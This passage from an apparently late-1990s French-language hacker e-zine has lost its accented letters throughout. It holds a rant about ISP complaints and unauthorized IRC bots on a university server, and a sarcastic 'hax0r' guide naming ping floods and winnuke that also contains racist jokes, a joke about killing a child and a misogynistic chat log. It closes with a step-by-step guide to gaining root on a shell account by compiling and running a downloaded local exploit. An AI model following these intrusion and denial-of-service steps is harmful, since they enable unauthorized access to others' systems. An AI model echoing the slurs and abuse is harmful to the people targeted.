jugeait que ces infos taient confidentielles et ils ne pouvaient pas plus me dire si l'UQUAM avait tlphon ou bien s'ils avaient envoys un e-mail. (J'aurais d peut-tre me renseigner ailleurs et appeler directement l'UQUAM, chose que je n'ai pas fait.) J'ai essay d'oublier cette plainte mais a me trottait encore un peu dans la tte tout a (normal...non?). La vie repris un cours normal, sauf que deux semaines plus tard: UNE AUTRE PLAINTE. Et celle la est vraiment trop drle... Encore un mercredi, je reois un autre tel# de la part de Quebectel cette fois ci m'avisant que je m'tait introduit dans le dpartement d'lectronique de l'universit TAMU au texas. (eesun1.tamu.edu : server rapide mais un peu mal administr..) OUI, je confirme que j'avais un BOT sur ce server, semi-legit, puisque l'utilisateur (tudiant) me laissait runner un bot condition que je n'alle pas jouer dans ses donnes (gars trs cool) mais c'est un gars qui n'utilisait pas vraiment ce server de toute faon et cela pour une raison que j'ignore totalement. En reloadant mon bot (!#$!) par un bo lundi du dbut avril, j'ai dcid de loguer directement dans le shell, utilisant mon adresse IP Globetrotter (*.quebecel.com). Bon, la plainte reue, videmment je suis retourn sur internet ET CETTE fois ci, j'ai vraiment voulu savoir de qui cette plainte venait. Bizarrement et surtout MA GRANDE SURPRISE, le bot tait encore up dans mon channel (bon un peu bizarre..). J'ai prit un autre shell et j'ai essay de me loguer sur eesun1.tamu.edu, WHAT THE FUCK, encore ACCS? Ils n'avaient mme pas changer le pass ou seulement deleter l'account en question, j'ai killer le bot pis jme suis dit qui fallait je parle avec un de ses maudits admins bizarres! J'ai envoy des emails, j'ai essay de parler un admin sur le shell, j'ai russi seulement une semaine aprs avoir eu la *plainte*. Le gars avec qui j'ai parl ne savait mme pas de quoi je parlait!!!!!!!!!!! JE LUI APPRENAIS MOI MME QUE JE RUNNAIT EXACTEMENT 2 BOTS SUR SON SERVER! (Le root la!!!!) J'ai parl avec un bon ti boutte, pis y semblait mme pas s'intresser mon cas, le gars tait ben smatt mais y'avait autre choses faire. Il ma juste dit qu'il pouvait pas me laisser runner un bot sur un server qui est mme pas supposer en accepter et que l'tudiant qui me l'avait 'prter' n'aurait pas d (le server est dans le style PRIVATE) Il ma dit bye, j'ai quitt, pis chu pu jamais retourn sur ce server. Qui a envoy ce email QUEBECTEL? Si c'est vraiment eux, pourquoi ils n'ont pas AU MOINS killer mes background process? (2 bots..) Une autre histoire qui restera innexplique!?! Entk. Continuez lire y'en a une autre bonne qui arrive... La dernire plainte a vraiment t la dernire. Mais voil encore une plainte sans fondements. J'ai parl avec le directeur de Globetrotter qui m'a dit que cette dernire plainte tait au sujet d'un petit 'ami' qui avait fait une plainte mon sujet qui disait que je l'avait nuker et que je le fesait chier sur IRC. Premirement, je n'ai NULLEMENT nuker cet utilisateur (je ne sais pas c'est qui mais j'ai mes doutes..) Le directeur de Globetrotter a rpliquer en disant qu'il avait mon IP et que a correspondait parfaitement avec mon LOGIN@. Bien sure, le gars eu mon IP (HAHAHA) depuis quand il faut que tu nuke quelqu'un pour qu'il obtienne ton adresse IP? J'aurais peut-tre d lui parler de la commande /dns 'nick' ou encore mieux, une commande trs difficile retenir: /whois 'nick'. EN FAIT, JE PENSE QUE JE SAIS PARFAITEMENT QUI M'A FAIT PERDRE MON COMPTE GLOBETROTTER:  t'as tu fini d'envoyer des fausses plaintes a Quebectel???  T'aurais pas du faire ca mon homme.  Faire quoi???  T content mon criss je lai perdu mon account?!?  Tu le sais ben trop qu'est ce que tu as fait mon homme...  c ca.. Mes doutes s'arrtent donc sur cette personne pour au moins 2 des 4 plaintes que j'ai reus. En conclusion, avant de vous choisir un ISP, parler avec quelqu'un qui a un account dessus depuis un bon bout de temps. Quebectel ne semble vraiment pas intress avoir des troubles-ftes sur leur server, mais je pense qu'il y a toujours une limite a cracher sur le monde. Pourquoi aller croire tout le monde qui envoie des plaintes comme ci, comme a? Est-ce que faire perdre l'account PPP de kekun est si facile? J'ai bien peur que les gens qui se font accuser de milles et une choses ne peuvent pas faire grand chose pour se dfendre. Je serais bien curieux de savoir si tous les emails qui ont t envoys sur mon dos taient VRITABLES!? (j'en doute) Je ne pourrai pas changer grand chose a, des tite chicanes de bbs sur irc qu'est ce que tu veux que les admins disent de a? (duh!!!#$$#$!#$$#@%) Essayez juste de pas trop avoir d'ennemis sur irc...so next time, take care of yourself, and each other.. bye! P.S: Quelqu'un a dja vcu a? sur Quebectel...ou ailleurs? Si oui, emailez moi maniakz@yahoo.com J'aimerais bien aussi savoir si quelqu'un sait si le server de QUEBECTEL (GLOBETROTTER) est runn sous WindowsNT ou un autre O/S. Je voudrais aussi savoir les possibilits au sujet des FAKE EMAILS : (i.e: admin@uquam.ca .. Subject: Fraude) et savoir quels O/S sont les plus vulnrables. Si j'apprend que QUEBECTEL est trop vulnrable cela... HMmmm? --- L'INCOMPTENCE TUE --- Ϳ Un guide pour les dbutants au hax0ring : par antilamerz superstar DISCLAIMER: cE t3Xt T cR1t dAnS lE 5eUL 3T UnIqu3 BuT D'1nf0rMer. s1 Tu Te F41T P0Gn3R En F41sANt Qu3LQUEChoSe d'iLL3G4L, c3 n'357 pAs DE m4 FaUt3!@#@! Non, sans blague, j'ai juste crit a pour divulger des infos librement! (nah...je me criss des infos, si jaurais vraiment trouver la libert d'expression si importante, je me serais trouv une job dans une librairie) J'ai juste crit a pour augmenter mon go et avancer mon status social dans le magnifique monde du hacking... .EOF. LIFE SUCKS Introduction Est-ce que la relve de hax0r est entrain de ruiner la rputation de ceux que nous pouvons considrer comme des vrais hackers? Ce n'est pas ncessairement qu'il y a trop de HACKERS, mais qu'il y a trop de WANNABE. Personnelement, je ne me considre pas comme un hacker, mais quelqu'un qui s'intresse assez ce sujet par example. (Je prvois crire un roman sur le sujet bientt HEHE!). Voici un petit guide un peu 'sarcastique' qui donne un bon portrait de tous ces petits 'wannabe l33t0 hax0rz' qui nous envahissent de plus en plus! =( --- Comme chaque BONS Hax0r le sait, parler de facon 31337 est la partie la plus importante du long processus pour devenir un vrai hacker. Donc, APPRENDS-LE, AIMES-LE! VIS-LE! Prendre un nickname de leet0 hax0r est aussi trs important, fais le avec prcautions ou les gens pourraient ne pas vous avoir peur de toi. ----------------------------------------------------------------------------- ------------- LE PREMIER PAS: Choisir son nickname (ou surnom..) ------------ ----------------------------------------------------------------------------- Tout les grands hax0rs on un nickname 31337. jm'en va t'aider choisir le meilleur pseudonyme possible.... PREMIRE TAPE: Prend un nickname qu'au moins 70 autres personnes ont; comme madman, coolman, acid, superman et demon. DEUXIME TAPE: Si tu peux pas en trouver un que des dizaines de personnes ont, assure toi d'en prendre un qui a des 's ou des 'z dedans, le monde vont trouver a dure tapper au clavier et a pourrait mme les dranger!!! Alors, en rsum, ne prends pas quelque chose qui a du sens. la place de prendre de quoi comme genre: MAD, essaye plutt XMaDx ou xXMaDXx ou encore mieux, _xMadx_ . TROISIME TAPE: Fait le poeurant, va pas prendre de quoi qui te dcris... ou quelque chose de trop simple! Mais prends un nickname plus dans le style de: H3LLGOD, H4CKER'z, ^AOLBITCH_ ou DEATHKILL. Tu peux pas savoir quel point le monde vont te trouver tellement cool! =) (SI TU ES DJ CONNECTER) QUATRIME TAPE: Embarque dans un groupe warez ou si tu veux tre vraiment 31337, start en un! Je suggre le nom V.H.E qui veut dire: Voluntary Human extinction. Le monde t'coeureront pas parce qui vont savoir que t un rvolutionnaire, un gars qui va vraiment changer de quoi dans notre socit. De toute faon, peu importe quel sorte de groupe que tu veux starter, fait de la pub en masse et un *.nfo pour montrer ton quipe... avec une petite note dans le bas: *Looking for Quality hackers as we are* L les tits newbies ou les sniors vont arriver l pis y vont vraiment commencer faire circuler ton nom en tant que MAD Hax0R. (SI TU ES DJ CONNECTER) CINQUIME TAPE: Aprs que tu aies eu un criss de cool de calisse de bo nickname va dans toute les newsgroup de 2600, posent foule de questions sur la faon de hacker des maudits gros server (parce que toi t'en ai rendu l...) comme a y vont savoir que tu sais de quoi tu parles. (SI TU ES DJ CONNECTER) SIXIME TAPE: Truc! : Maintenant que tu as tout ce respect tu pourrais te lancer dans le phreak et dire au petit *phreakeux* que tu peux leur en apprendre. Nickname choisit? le nom de ton groupe de hacking aussi? Bienvenu fiston! ----------------------------------------------------------------------------- ----------------------------- SECTION 1 : SE CONNECTER ---------------------- ----------------------------------------------------------------------------- Pour te connecter partir de la maison, tu dois d'abord possder un ordi... Tu peux en trouver aux ventes de garage, ou encore si tu prfres, dans les magasins spcialiss. Assure toi de dire au vendeur que tu l'achtes dans le seul et unique but de Hax0rEr. Aprs que tu aie acquri un ordinateur, check si tu as un modem dedans. Y'a comme des petites sorties pour le tlphone sur un modem, c'est souvent une petite boite avec une lumire dessus aussi. MAIS, ATTENTION ! NE JAMAIS UTILISER UN MODEM POUR FAIRE DES APPELS AUTRES QUE POUR SE CONNECTER SUR LE NET! La plupart du temps ces tlphones sont mis sur coute par la police, essaye de pogner un modem _externe_ les polices ne pourront donc pas couter sur une extension. Bon, aprs avoir appris que t'a un modem, t'est pas loin de devenir un hacker! La prochaine chose que tu as faire c'est de te pogner un account sur America online immdiatement, c'est le terrain de jeu des hackers, tu vas y rencontrer plein de monde intelligent. Pour faire a par example, il faut rflchir un peu. Y faut d'abord que tu te pognes quelques softwares d'AOL. Pour faire ainsi, tu peux te rendre ton bureau de poste local et rclamer un bo cd d'AOL. AOL est financ par les gouvernements et habituellement gratuits dans les 50 permires heures! Si t' est trop gn pour aller voir la *femme mail* attend un peu, dans 2-3 mois tu devrais avoir un disk d'AOL, si c'est pas dj le cas. Aprs avoir surloader ton Hard drive avec leur bullshit de softwares, tu es fin prt te crer un tit account. Bon videmment, prends un login comme *AOLKILLER* ... de quoi de trs *killer* comme je l'expliquais plus haut... Account cre? Pas encore? Facture de 350$ d'interrurbains parce que tu te connectait sur AOL Au Japon? Peu importe, ceux qui passent cette tape doivent sauter la SECTION 2. P.S: Hey Les amis, si vous avez un modem, mais pas accs internet, ni les magnifiques softwares AOL, vous pouvez aller les pogner sur leur BBS GRATUIT !!! Ϳ SOFTWARES, INFOS! AOLZ BBS: 1-800-827-5808 HELP, FREE STUFF! ----------------------------------------------------------------------------- -------------------------- SECTION 2: AVOIR L'AIR COOL ---------------------- ----------------------------------------------------------------------------- La chose la plus importante quand tu hack est d'avoir l'air cool. Si t'a l'air cool, les gens t'aiment et tu peux donc les hax0rer comme tu veux. Si ils ne pensent pas que t'a l'air cool, c'est des lamers de toute faon! Avoir l'air cool s'accomplie en ayant une attitude de "bad-ass" et en ayant des qualits uniques et personelles, comme tre un raveux ou un drogu... Trs bizzarement la plupart des gens vont penser que t'ai cool si tu leur dit que t'ai une femelle! Y vont aussi penser que tu es cool si tu t'arranges pour qu'il te ph33r. Mais l'art de se faire ph33rer viendra plus tard dans les chapitres suivants, tant une mthode de hacking plus avance. Prsentement, fait juste suivre ces quelques rgles propos de l'art d'avoir l'air cool: Ne parle jamais d'ordinateur et utilise toujous des lettres majuscules et des chiffres lorsque tu crit (sur irc par exemple). Oh...et pour te dire... pour passer pour un leet0 hax0r tu d015 t3 f41r3 arreter par le FBI/GRC plusieurs fois. Bon, mettons les choses au claire, c'est quelque chose qui est DURE prouver, voyons quelques techniques pour te faire arrter par la police: I. Joue des tours au FBI, c'est trop hot, surtout quand il te retrace pas. II. Hack directement leur serveur avec un ordinateur que t'a pris sur le march noir, si tu penses que les techniciens du server sont trop nuls, assure toi de laisser ton nom et ton adresse quelque part sur le server (laisser le numro de tlphone serait pratique) Tu ne penses pas pouvoir les hacker? tu feel pas au hacking today? Pas de prob, suit attentivement les autres mthodes qui s'offrent toi: III. Appele la police. Appele la police et dit leur que tu connais un gros vendeux de drug de la mafia dans le style super dangeureux, qui reste dans l'appart cot de chez vous! Mais donne leur TON adresse! Tu laisses ta porte grande ouve- rte avec une note des choses que tu prvois faire dans ta soire (note que tu laisses la porte de tous(sur la table...)). 1. Faire la vaiselle 2. Ramasser ma chambre 3. Faire l'picerie 4. Hacker satellite3.pathfinder.06.nasa.gov 5. Garder l'enfant de la voisine 6. Torturer l'enfant de la voisine 7. Tuer l'enfant de la voisine 8. Camoufler la dpouille de l'enfant de la voisine dans un buisson. etc.. etc.. Aussi, assure toi d'avoir plein d'infos au sujet des drogues, ment, comme a tu peux tre sure qui vont t'arrter. Si y refuse encore de t'arrter, met toi crier: HACK THE PLANET!!! AOL SUCKS!!! FREE BINEZ !! ... a drange pas si t'a l'air d'un pauvre con, tous les hackers n'ont aucuns sens. (*) * Point de vue sarcastique de l'auteur. Maintenant que t'a fini ton ptit show de l33tness aprs avoir t arrt et relach (faute de preuves!), va te vanter et parler de pourquoi et comment tu t'ai mis la CIA le FBI et la GRC dos. Si y'a un petit looser qui ne te crois pas, hax0r lui le cul sans aucune piti. D'autres faons d'avoir l'air cool inclusent le scrolling, le mass mailing, et n'oublions pas le pouvoir extrme du Ph33rage. Mentionnons aussi que tous les hackers doivent tre racistes, sexistes et des btards apocalyptiques, alors supporte ton kkk local. N'oublie pas de traiter la femme comme un pussy et souviens toi que tu peux acheter l'amour. La dernire faon d'avoir l'air cool (et ceux-l sont les seules faons) est d'affirmer que t un des bons friends de Kevin Mitnik ou un membre d'un des plus gros groupes de hacking au monde. (2600, HIP, WQ...) Cela va augmenter grandement la peur que les gens auront envers toi, mais si ils demandent n'importe quelle questions ce sujet, soit que tu les ignores ou soit que tu es EXTRMEMENT vague dans tes rponses sinon ils ne te prendront pas au srieux parce que les vrais LEET0 hax0rz n'ont jamais de fait, il disent juste des choses comme: "Moi et kevin on est les meilleurs amis au monde, on hax0r binez ensemble" C'est a qui va impresionner tout le monde et qui va te donner une rputation de L33t instantanment et le plus important, tu vas avoir l'air COOL! ----------------------------------------------------------------------------- ------------------------- SECTION 3: L'ART DE FAIRE PEUR -------------------- ----------------------------------------------------------------------------- S'arranger pour que les gens te ph33r ne vient pas facilement. C'est un art. Pour qu'il ait peur de toi, en premier lieu, tu doit demander des questions comme: "R there any good hax0rs here?!? Gimme a good dial-up for Unix if u dare". En second lieu, tu dois parler comme un "warez-pup" qui dit des choses comme: "jo0r m0mma!" bon videmment c'est une autres des techniques...tout comme hax0rer les chat rooms de AOL. Traite les gens de lame aussi. Tu vois? Trop facile! et le monde te ph33r maintenant. Mais ne pense jamais que tu 0wn binez; "ph33r binez cuz he owns YOU". ----------------------------------------------------------------------------- -------------------------- SECTION 4: L'ART DE "FUCKER" --------------------- ----------------------------------------------------------------------------- Avant, de fucker le monde, tu dois savoir ce que tu essais d'accomplir. Si tu as l'intention de voler, modifier ou briser, continue ta lecture. En effet, tu peux facilement take over l'ordi de quelqu'un en obtenant son adresse ip. Soit en connaissant l'adresse de leur site warez ftp (ou simplement en leur demandant (HEHE)) Tu peux les faire chier avec un program super rare et cool (ping.exe) en les pingant sans arrt! S'ils ont un FTP, tu peux le killer en utilisant un trs leet PORT FUCKER, set le a "Fuck" port 21! Tu es un hacker plus avanc? Utilise winnuke, cet outil trs puissant va les rebooter BADLY et toute les fucker, toutefois je n'ose pas m'avancer davantage sur cet outil trs puissant que les gens ngligent mon avis... ----------------------------------------------------------------------------- --------------------------- SECTION 5: ADVANCED SKILLZ ---------------------- ----------------------------------------------------------------------------- Aprs avoir chemin travers des mthodes de base du |-|4><0|2ing, regardons de plus prs les techniques avanes: La premire chose que t'a faire (QUAND TU SAIS QUE TU ES UN HACKER DJ TRS POPULAIRE) est d'aller dans les channels "\\'4r3z" et d'y passer un bon minimum de 4238923487 heures par semaine jusqu' ce que tu store au moins 8-9 Gigs de warez (mme si t'en as pas de besoin). Maintenant va dans un channel de jeune "phreaks" (i.e: #!!!!!!warez&your_mom) et offre des trades WAREZ '4' WAREZ. C'est trs l33t de prendre en considration que les gens vont t'ignorer si tu ne le dis qu'une seule fois, alors un VRAI hax0rz le scrollerait au moins de 10 12 fois, et comme je l'ai enseign dans les chapitres prcdent, tous ces textes doivent tre crits avec des LEE70 WaREZ FoNtz. Si aprs 3 sec. y'a pas personne qui a rpondu, scroll le encore (seulement 9 ou 10 fois). N'est pas peur d'utiliser une ponctuation xagre (i.e: ANYONE WANNA TRADE PAPERBOY FOR THE LAST VERSION OF WOLFENSTEIN 3D???!!!!???). Asteur, plusieurs fois a pourrait bien arriver qu'un petit lamer qui est la essaye de gcher, de ruinner ta leetn355 gnrale en disant de la bullshit dans le style : "This isn't a warez room". coute les pas, utilise une des techniques que je t'ai appris et montre leur c'est qui le CRISS de 1337 icite... Si ces lamers semblent vraiment invincibles, t'a juste rire de leur mres et les traiter de pauvres GAYS. ----------------------------------------------------------------------------- ----------------------------- SECTION 6: PHREAKING -------------------------- ----------------------------------------------------------------------------- Cette setion porte sur un sujet chaud! Le phreaking. Le mot en tant que telle (Phreaking) peut se rsumer en un terme assez simple: pHonE Hax0rIng. Pour tre un super phreaker, tu as besoin des lgendaires botes colores. Pour pouvoir construire ces botes, tu as besoin du matriel suivant: Red Box: -Une bote, de la peinture rouge en spray. Blue Box: -Une bote, de la peinture bleu en spray. Black Box: -Une bote, de la peinture noire en spray. Vu le fait que ses botes sont si difficiles construire, nous allons changer de sujet, prenez un break. Allez vous reposer les yeux ou vous chercher manger, puisque dans la prochaine SECTION nous changeons de sujet de faon draftique (...?) Nous allons parler de la faon d'avoir du succs auprs de la gente fminine en tant que LEET HAX0R. On aurait bien sure pu parler d'autre sujets comme les BBS ou simplement argumenter davantage sur le hacking, mais les femmes passent avant a! ----------------------------------------------------------------------------- ---------- SECTION 7: LES CYBER-POUPES ET COMMENT CE LES FAIRES. ----------- ----------------------------------------------------------------------------- Dans l'une des sections plus haut, j'crivait, et je cite: 'N'oublie pas de traiter la femme comme un pussy et souviens toi que tu peux acheter l'amour.' Un vrai 'Mad HaX0r From hell' voudrait encore plus de conseils ce sujet, eh bien je vais approfondir sur ce sujet avec d'autres techniques et mme des exemples pour savoir comment tre apprci des filles sur LE NET. Une vraie cyber-poupe est une fille qui hack. Une cyber-poupe est souvent la rcompense de tout bon hacker. Bien sure, les filles peuvent *pas* tre de *vraies hackeuses* mais c le fun qu'il y en ait quelques unes qui semblent le prtendre, a ajoute de la diversit dans la communaut du hacking. Une bonne faon de dcouvrir s'il y a des hackeuses hot dans des channels IRC est de le demander! (i.e: 'R THERE ANY FEMALES IN DA ROOM?!!?@#$\@'). Donc, si tu as dcouvert qu'il y en a plusieurs dans ton channel, c'est probablement une bonne ide d'aller les gagner l'aide de ton charme de 1337. Tu fais a en leur montrant qui est le boss. Par example: *** Joins: Binez_ (binez@whitehouse.gov) Binez_: Y'as tu de la femme ICITE %???!!? I NEED PUSSIES!!!!! /MSG ME Babe17: arghn, il recommence encore! :\ Binez_: BABE17, T'EST UNE NANA!?!??!? Babe17: Je N'ai pas de sexe :) maniak: Binez, laisse la tranquille!!!!!!! *** Quits: maniak (Read Error 54: (Connection Reset By Peer)) Binez_: HAHA pauvre lamer!$@@$!\#@ Binez_: Babe17, FUCK OFF CRISS DE CHIENNE! Babe17: heh? Binez_: MAUDITE SALOPPE, MANGEUSE DE PLOTE, RENTRE TOI UN PENIS DANS L'CUL! Babe17: Hihi, je savais que tu tais impuissant! :P hihi Binez_: TA YEULE MA CRISS, TU TCALLE !!!!!!!!!!!! *** Parts: Binez_ (binez@whitehouse.gov) Comme vous avez pu lire, Babe17 dsire Binez au plus haut point. Il n'a qu' la dominer quelques reprises et il s'en rendrera compte... Si les filles ont peur de toi en tant que hacker, a te met d'une marche plus haut vers la domination totale du hax0r... Conclusion Vous pourrez tirer vos propres conclusions de ce texte, un peu humoristique.. Que vous soyez un bon hacker, un VRAI de VRAI, un dbutant, un gars qui s'amuse ou mme si vous savez que vous valez pas de la marde mais que vous dites le contraire aux gens qui vous entourent, l'important c'est de se sentir bien dans ce que vous faites, comme dans la vie de tous les jours... - antilamerz superstar -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Comment rooter un account shell (pour les dbutants) Par WoUpZy (calisse@usa.net) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bon premierement vous devez bien sure avoir acces a un host-shell soit que vous payez, que vous en echangez, ou que vous en rippiez sur #Shells (efnet). 1) Connectez vous sur votre account 2) Il existe plusieurs systemes d'exploitation tels que linux, FreeBSD, unix, Solaris, etc.... pour savoir quel systme le shells utilise tappez la commande "uname -a" et vous devriez voir aparaitre quelque chose du genre de : [Satan@ Satan]$ uname -a Linux host.du.shells 2.0.31 #1 Sun Nov 9 21:45:23 EST 1997 i586 unknown [Satan@ Satan]$ Linux est le systeme d'exploitation et le kernel utilis est 2.0.31 3) Si vous savez le systeme d'exploitation et le kernel vous avez maintenant besoin d'un exploit que vous trouverez sur www.rootshell.com ou autre place sur le net sur www.rootshell.com... c'est simple : faites un search sur le systeme d'exploitation que vous voulez rooter et il va vous lister tout les exploits possible. 4) Uploadez l'exploits sur le shells en ftp ou autre moyens et puis compilez le en tappant "cc -o fichier fichier.c" (ou "gcc" au lieu de "cc"). Exemple, si mon nom de fichier c'est linuxroot.c -> tappez : "cc -o linuxroot linuxroot.c" si vous voyez pas de message d'erreur lors de la compilation vous etes trs bien partit 5) Suite a la compilation sans erreur tapper ./fichier Exemple, si vous avez compiler linuxroot.c tapper ./linuxroot Si vous ne voyez pas de message d'erreur encore une fois voil tappez "whoami" et si vous voyez root voila vous tes root (administrateur) sur la box vous pouvez faire ce que vous voulez. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 0=------------=0 | Conclusion | 0=------------=0 Par Err418 (err418@technologist.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bon ben, un autre numro de terminer... j'espre que comme toujours vous en avez appris et que vous aimez les articles prsents. Si vous dsirez crire l'quipe de TC Magazine pour nous faire vous commentaires ou bien pour nous soumettre un article... faites le l'adresse suivante : err418@technologist.com See ya le 13 juillet 1998 pour le #15... je vais vous redonner des nouvelles de Corruption Addicts. bye. (-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission-=-=-=-=-=-=-=-=-=-=-=-=-=)